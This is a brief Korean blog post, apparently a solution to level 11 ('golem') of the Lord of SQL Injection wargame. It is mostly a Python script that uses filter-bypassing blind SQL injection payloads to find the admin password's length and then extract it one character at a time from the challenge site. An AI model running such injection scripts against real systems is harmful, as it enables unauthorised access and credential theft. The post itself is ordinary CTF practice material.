[LOS] 11번 golem

C. 웹/실습

[LOS] 11번 golem

E-HO 2017. 8. 25. 09:30

728x90

ㅎㅇ

필터링을 우회한 쿼리문을 이용해 파이썬 코드를 작성해보았다.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
import requests
 
URL = 'https://los.eagle-jump.org/golem_39f3348098ccda1e71a4650f40caa037.php'
head = {'cookie' : 'PHPSESSID=pcuuoc9mef56coh8jo1e3rq994;  _cfduid=de63e93b1fee3ab4d7fa46e679599d9381503410506'}
 
def answer(num):
    for a in range(1,num+1):
        for b in range(48,128):
            params_a = {'pw' : "'|| 1<3 && ascii(substring(pw,"+str(a)+",1)) like '"+str(b) }
            res_a = requests.get(url=URL, params=params_a, headers=head)
            if("Hello admin" in res_a.text):
                print(chr(b))
                break
            
for i in range(5,15):
    params = {'pw' : "' || 1<3 && length(pw)like'"+str(i)}
    res  = requests.get(url=URL, params=params, headers=head)
    if ("Hello admin" in res.text):
        print(i)
        answer(i)
        break
 
 
Colored by Color Scripter
cs

%26 안되는거 주의..

8자리 비번을 입력하면

해결!